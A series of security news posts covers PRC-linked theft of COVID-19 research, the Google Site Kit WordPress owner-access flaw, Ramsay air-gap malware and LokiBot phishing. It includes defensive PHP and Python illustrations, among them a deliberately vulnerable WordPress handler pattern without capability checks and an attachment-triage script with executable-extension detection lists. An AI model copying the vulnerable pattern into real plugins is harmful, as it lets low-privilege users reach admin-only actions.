“The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are issuing this announcement to raise awareness of the threat to COVID-19-related research. The FBI is investigating the targeting and compromise of U.S. organizations conducting COVID-19-related research by PRC-affiliated cyber actors and non-traditional collectors.” reads the joint alert. “These actors have been observed attempting to identify and illicitly obtain valuable intellectual property (IP) and public health data related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research.”

“The F.B.I. and the Department of Homeland Security are preparing to issue a warning that China’s most skilled hackers and spies are working to steal American research in the crash effort to develop vaccines and treatments for the coronavirus. The efforts are part of a surge in cybertheft and attacks by nations seeking advantage in the pandemic.” reported The New York Times.

“China’s efforts to target these sectors pose a significant threat to our nation’s response to COVID-19,” the FBI and CISA statement adds.

The US agencies recommend that targeted organizations adopt cybersecurity best practices to prevent state-sponsored hackers from stealing COVID-19-related material.

“What else is new with China? What else is new? Tell me. I’m not happy with China,” President Trump commented. “We’re watching it very closely.”

“China’s long history of bad behavior in cyberspace is well documented, so it shouldn’t surprise anyone they are going after the critical organizations involved in the nation’s response to the Covid-19 pandemic,” said Christopher Krebs, the director of the Cybersecurity and Infrastructure Security Agency. He added that the agency would “defend our interests aggressively.”

The Chinese government rejected the allegations on Monday.

“We are leading the world in COVID-19 treatment and vaccine research. It is immoral to target China with rumors and slanders in the absence of any evidence,” Foreign Affairs ministry spokesman Zhao Lijian said.

The Chinese government is not the only one interested in COVID-19 research: nation-state hackers from Russia, Iran, and North Korea are also launching spear-phishing and misinformation campaigns targeting organizations and scientists involved in vaccine research.

Last week the US and the UK issued a joint alert warning of a rise in cyber attacks carried out by foreign states against healthcare organizations and researchers.

This is my interview on the topic at TRT World

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post China-linked hackers are attempting to steal COVID-19 Vaccine Research appeared first on Security Affairs.

Google WordPress Site Kit plugin grants attacker Search Console Access

Experts found a critical bug in Google’s official WordPress plugin ‘Site Kit’ that could allow any authenticated user, even one with minimal privileges, to gain owner access to the targeted site’s Google Search Console.

The Site Kit WordPress plugin makes it easy to set up and configure key Google products (Search Console, Analytics, Tag Manager, PageSpeed Insights, Optimize, and AdSense), giving users authoritative and up-to-date advice on how to succeed on the web. It has over 300,000 active installations.

Experts from Wordfence found a critical bug in the ‘Site Kit’ plugin that could be exploited by any authenticated user, even one with subscriber-level privileges, to gain owner access to the targeted site’s Google Search Console.

“This flaw allows any authenticated user, regardless of capability, to become a Google Search Console owner for any site running the Site Kit by Google plugin.” reads the analysis published by Wordfence.


The vulnerability is caused by the disclosure of the proxySetupURL in the HTML source code of admin pages. That URL is used to redirect a site administrator to Google OAuth and to run the site-owner verification process through a proxy.

“In order to establish the first connection with Site Kit and Google Search Console, the plugin generates a proxySetupURL that is used to redirect a site’s administrator to Google OAuth and run the site owner verification process through a proxy.” continues the analysis.

“Due to the lack of capability checks on the admin_enqueue_scripts action, the proxySetupURL was displayed as part of the HTML source code of admin pages to any authenticated user accessing the /wp-admin dashboard.”

The experts also noticed a second issue: the verification request used to prove ownership of a site was registered as an admin action that performed no capability check, so the request could come from any authenticated WordPress user, including those with minimal permissions.

Chaining the two flaws, an attacker can take ownership of the site’s Google Search Console property, which allows them to modify sitemaps, remove pages from Google search engine result pages (SERPs), or facilitate black hat SEO campaigns.

“These two flaws made it possible for subscriber-level users to become Google Search Console owners on any affected site,” continues Wordfence.

“An owner in Google Search Console can do things like request that URLs be removed from the Google Search engine, view competitive performance data, modify sitemaps, and more. Unwarranted Google Search Console owner access on a site has the potential to hurt the visibility of a site in Google search results and impact revenue as an attacker removes URLs from search results. More specifically, it could be used to aid a competitor who wants to hurt the ranking and reputation of a site to better improve their own reputation and ranking.”
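The two missing checks described above, shown side by side with their hardened forms as an added illustration. This is not Site Kit’s code and does not reproduce Google’s fix; the plugin prefix `example_`, the option name, the screen id and the action slug are hypothetical, and the nonce on the action handler is a standard WordPress precaution added here beyond what the advisory discusses.

```php
<?php
/*
 * Added illustration (not Site Kit's code): capability checks on the
 * admin_enqueue_scripts hook and on an admin_action_* handler.
 * All names prefixed example_ are hypothetical.
 */

// Vulnerable pattern: admin_enqueue_scripts fires for every user who can load
// /wp-admin, so a Subscriber sees the setup URL in the page source.
function example_enqueue_vulnerable() {
    $setup_url = get_option( 'example_proxy_setup_url' ); // hypothetical option
    wp_enqueue_script( 'example-admin', plugins_url( 'admin.js', __FILE__ ), array(), '1.0', true );
    wp_localize_script( 'example-admin', 'exampleSetup', array( 'proxySetupURL' => $setup_url ) );
}
// add_action( 'admin_enqueue_scripts', 'example_enqueue_vulnerable' );

// Hardened pattern: bail out unless the user may manage the site, and only
// emit the URL on the plugin's own settings screen.
function example_enqueue_hardened( $hook_suffix ) {
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    if ( 'toplevel_page_example-setup' !== $hook_suffix ) { // hypothetical screen id
        return;
    }
    $setup_url = get_option( 'example_proxy_setup_url' );
    wp_enqueue_script( 'example-admin', plugins_url( 'admin.js', __FILE__ ), array(), '1.0', true );
    wp_localize_script( 'example-admin', 'exampleSetup', array( 'proxySetupURL' => $setup_url ) );
}
add_action( 'admin_enqueue_scripts', 'example_enqueue_hardened' );

// Vulnerable pattern: an admin_action_* handler runs for any logged-in user who
// requests /wp-admin/admin.php?action=example_verify_owner.
function example_verify_vulnerable() {
    update_option( 'example_owner_verified', 1 );
    wp_safe_redirect( admin_url() );
    exit;
}
// add_action( 'admin_action_example_verify_owner', 'example_verify_vulnerable' );

// Hardened pattern: require the capability and a nonce bound to the action.
function example_verify_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'example_verify_owner' ); // dies on a missing or invalid nonce
    update_option( 'example_owner_verified', 1 );
    wp_safe_redirect( admin_url() );
    exit;
}
add_action( 'admin_action_example_verify_owner', 'example_verify_hardened' );

// The link that triggers the action carries the matching nonce.
function example_verify_link() {
    $url = admin_url( 'admin.php?action=example_verify_owner' );
    return wp_nonce_url( $url, 'example_verify_owner' );
}
```

The check a practitioner would run against any plugin that hooks `admin_enqueue_scripts` or `admin_action_*` is the same one Wordfence describes: log in as a Subscriber, load `/wp-admin`, and search the page source for URLs or tokens that only an administrator should ever see; then request each registered admin action directly and confirm it refuses the low-privilege session.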

The good news is that Google sends an email alert when a new Google Search Console owner is added, allowing admins to remove the unknown owner.

As an extra precaution, admins can also reset the Site Kit connection, after which all previously connected Google services must be reconnected.

Wordfence discovered the privilege escalation issue on April 21 and reported it to Google on April 22.

Google addressed the vulnerability on May 7 with the release of Site Kit 1.8.0.

At the time of writing, over 200,000 site owners have updated the plugin, but over 100,000 sites are still running a vulnerable version.

Pierluigi Paganini

(SecurityAffairs – Site Kit, hacking)

The post Google WordPress Site Kit plugin grants attacker Search Console Access appeared first on Security Affairs.

New Ramsay malware allows exfiltrating files from air-gapped computers

Experts discovered a new strain of malware dubbed Ramsay that can infect air-gapped computers and steal sensitive data, including Word, PDF, and ZIP files.

Researchers from security firm ESET discovered a new advanced malware framework named Ramsay that appears to have been designed to infect air-gapped computers and exfiltrate sensitive data.

The malicious code collects sensitive files, including Word, PDF, and ZIP files, in a hidden storage folder, then waits for the opportunity to exfiltrate them.

“ESET researchers have discovered a previously unreported cyber-espionage framework that we named Ramsay and that is tailored for collection and exfiltration of sensitive documents and is capable of operating within air‑gapped networks.” reads the report published by ESET.

The malware was specifically designed to jump the air gap and reach computers within isolated networks to steal sensitive information.

The researchers found a sample of Ramsay after it was uploaded to VirusTotal from Japan; they then discovered further components and versions of the framework, which suggests it is still under active development.

Experts believe at least three variants of the malware exist, tracked as v1, v2.a, and v2.b. Ramsay v1, first compiled in September 2019, is the least complex.

The v2.a and v2.b samples were compiled on March 8 and March 27, 2020, respectively. Both include a rootkit component, but only v2.a implements spreading capabilities.

The less complex versions of the malware are dropped by weaponized documents exploiting CVE-2017-0199 and CVE-2017-11882, two remote code execution vulnerabilities in Microsoft Office.

Ramsay v2.a is delivered through a fake installer for the 7-Zip file compression utility.


Ramsay allows attackers to collect all Microsoft Word documents on the target computer; the most recent variants are also able to collect PDF files and ZIP archives from network drives and removable drives.

ESET researchers were not able to identify the exfiltration module used by the malware.

ESET did not attribute Ramsay to a specific threat actor; the researchers only noted some similarities with the Retro malware family employed by the DarkHotel APT group.

“Based on the different instances of the framework found Ramsay has gone through various development stages, denoting an increasing progression in the number and complexity of its capabilities. Developers in charge of attack vectors seem to be trying various approaches such as old exploits for Word vulnerabilities from 2017 as well as deploying trojanized applications.” concludes ESET.

“We interpret this as that developers have a prior understanding of the victims’ environment and are tailoring attack vectors that would successfully intrude into targeted systems without the need to waste unnecessary resources.”

Pierluigi Paganini

(SecurityAffairs – Ramsay malware, hacking)

The post New Ramsay malware allows exfiltrating files from air-gapped computers appeared first on Security Affairs.

Crooks continue to use COVID-19 lures, Microsoft warns

Microsoft discovered a new phishing campaign using COVID-19 lures to target businesses with the infamous LokiBot information-stealer.

Microsoft has discovered a new COVID-19 themed phishing campaign targeting businesses with the LokiBot Trojan.

LokiBot was already employed in Coronavirus-themed campaigns: in early April, security experts at FortiGuard Labs discovered phishing attacks using alleged messages from the World Health Organization (WHO) to deliver the trojan.

Microsoft observed two COVID-19 themed campaigns delivering the malware.

The LokiBot data stealer is able to collect information from dozens of web browsers, including browsing data and saved credentials, locate the credentials for more than 15 email and file transfer clients, and check for the presence of popular remote administration tools such as SSH, VNC and RDP clients.

One of the campaigns sees the attackers pretending to be from the Centers for Disease Control (CDC); the messages promise the latest information on the COVID-19 pandemic under the subject line “BUSINESS CONTINUITY PLAN ANNOUNCEMENT STARTING MAY 2020”.

The other campaign uses messages that pretend to come from a vendor asking for updated banking information to process payments during the COVID-19 lockdown.

The emails in both campaigns carry ARJ attachments containing malicious executables disguised as PDF files.

The choice of password-protected ARJ archives aims at bypassing security solutions that cannot inspect encrypted content. Once the victim opens the enclosed file, the infection chain starts and ultimately delivers the LokiBot Trojan.
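Because a password-protected archive defeats content scanning, the signals left to a mail gateway are the archive’s own headers: the garbled flag, the member names and the declared sizes. The following triage routine, added here as an example and not Microsoft’s detection logic or anything from the campaign, parses an ARJ attachment’s headers and flags the combination described above. The header layout follows the public ARJ technical note (2-byte id `0x60 0xEA`, 2-byte basic header size, `first_hdr_size`, version bytes, flags, method, file type, sizes, then a null-terminated name); the sample archive is constructed inline and its member bytes are a placeholder standing in for encrypted data.

```python
"""Added triage example: parse ARJ headers and flag a password-protected
archive whose member disguises an executable as a PDF. Not LokiBot code and
not Microsoft's detection logic. The header layout follows the public ARJ
technical note; extended headers are skipped, not interpreted."""
import struct
import zlib

ARJ_MAGIC = b"\x60\xea"
ARJ_END = ARJ_MAGIC + b"\x00\x00"   # a header with basic size 0 ends the archive
GARBLED_FLAG = 0x01                  # bit 0 of arj_flags: encrypted (password-protected)
MAIN_HEADER = 2                      # file_type value reserved for the archive header
EXEC_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".dll")
DECOY_EXT = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt")


def build_header(flags, method, file_type, name, data=b"", orig_size=None):
    """Assemble one basic ARJ header (main or local) followed by an empty
    extended-header list; used only to construct the sample archives."""
    orig_size = len(data) if orig_size is None else orig_size
    body = struct.pack(
        "<BBBBBBBBIIIIHHBB",
        30,             # first_hdr_size: fixed part, the name starts right after it
        11, 1, 0,       # archiver version, minimum version to extract, host OS (MS-DOS)
        flags, method, file_type, 0,
        0,              # date/time stamp
        len(data), orig_size, zlib.crc32(data),
        0, 0,           # filespec position, file access mode
        0, 0,           # host data, last chapter
    ) + name + b"\x00" + b"\x00"     # file name, then an empty comment
    return (ARJ_MAGIC + struct.pack("<H", len(body)) + body
            + struct.pack("<I", zlib.crc32(body)) + b"\x00\x00")


def build_member(flags, method, name, data, orig_size=None):
    """Local file header plus the member's stored (or placeholder 'encrypted') bytes."""
    return build_header(flags, method, 0, name, data, orig_size) + data


def build_sample_attachment():
    """Constructed stand-in for the campaign's attachment: a garbled archive
    holding Business_Continuity_Plan.pdf.exe (placeholder bytes inside)."""
    blob = bytes(range(0x41, 0x41 + 24))
    return (build_header(GARBLED_FLAG, 0, MAIN_HEADER, b"BCP_MAY2020.ARJ")
            + build_member(GARBLED_FLAG, 0, b"Business_Continuity_Plan.pdf.exe", blob, 61440)
            + ARJ_END)


def parse_arj(blob):
    """Walk the headers; return (archive_flags, members). Each member records
    its name, flags, method, sizes and the first two bytes of its data."""
    pos = 0
    archive_flags = 0
    members = []
    while True:
        if blob[pos:pos + 2] != ARJ_MAGIC:
            raise ValueError("ARJ header id missing at offset %d" % pos)
        hdr_size = struct.unpack_from("<H", blob, pos + 2)[0]
        if hdr_size == 0:
            return archive_flags, members
        body = blob[pos + 4:pos + 4 + hdr_size]
        (stored_crc,) = struct.unpack_from("<I", blob, pos + 4 + hdr_size)
        if zlib.crc32(body) != stored_crc:
            raise ValueError("basic header CRC mismatch at offset %d" % pos)
        first_hdr_size = body[0]
        flags, method, file_type = body[4], body[5], body[6]
        comp_size, orig_size = struct.unpack_from("<II", body, 12)
        name = body[first_hdr_size:body.index(b"\x00", first_hdr_size)]
        pos += 4 + hdr_size + 4
        while True:                       # skip extended headers: size, payload, CRC
            (ext_size,) = struct.unpack_from("<H", blob, pos)
            pos += 2
            if ext_size == 0:
                break
            pos += ext_size + 4
        if file_type == MAIN_HEADER:
            archive_flags = flags          # the main header carries no data
            continue
        members.append({"name": name.decode("ascii", "replace"), "flags": flags,
                        "method": method, "comp_size": comp_size,
                        "orig_size": orig_size, "head": blob[pos:pos + 2]})
        pos += comp_size


def triage_attachment(filename, blob):
    """Return the reasons to quarantine the attachment (empty list = nothing found)."""
    reasons = []
    if blob[:2] == ARJ_MAGIC and not filename.lower().endswith(".arj"):
        reasons.append("ARJ signature under a non-.arj file name")
    archive_flags, members = parse_arj(blob)
    if archive_flags & GARBLED_FLAG or any(m["flags"] & GARBLED_FLAG for m in members):
        reasons.append("password-protected archive: members cannot be content-scanned")
    for m in members:
        lname = m["name"].lower()
        if lname.endswith(EXEC_EXT):
            reasons.append("executable member: " + m["name"])
            if lname.rsplit(".", 1)[0].endswith(DECOY_EXT):
                reasons.append("double extension disguising an executable as a document: " + m["name"])
        if not m["flags"] & GARBLED_FLAG and m["method"] == 0 and m["head"] == b"MZ":
            reasons.append("stored member begins with a PE (MZ) header: " + m["name"])
    return reasons


if __name__ == "__main__":
    for reason in triage_attachment("BCP_MAY2020.ARJ", build_sample_attachment()):
        print("quarantine:", reason)
```

The `MZ` check only fires on unencrypted, stored members; for the garbled case the verdict rests entirely on metadata, which is why the double-extension and password-protection reasons are reported separately rather than folded into one score.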

Microsoft pointed out that Microsoft Threat Protection’s machine learning detections caught the campaign, and that Microsoft Defender users are automatically protected.

“Microsoft Defender’s advanced detection technologies, including behavior learning and machine learning, started blocking this attack right away. We used deeper analysis of the blocked attacks, which helped us to identify the end-to-end campaign detailed,” Tanmay Ganacharya, director of security research of Microsoft Threat Protection, told BleepingComputer.

“We see a lot of benefits of leveraging machine learning and we are in a very unique position here at Microsoft because of the quality and diversity of our 8.2 trillion signals we process daily through the Microsoft Intelligent Security Graph.” 

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Crooks continue to use COVID-19 lures, Microsoft warns appeared first on Security Affairs.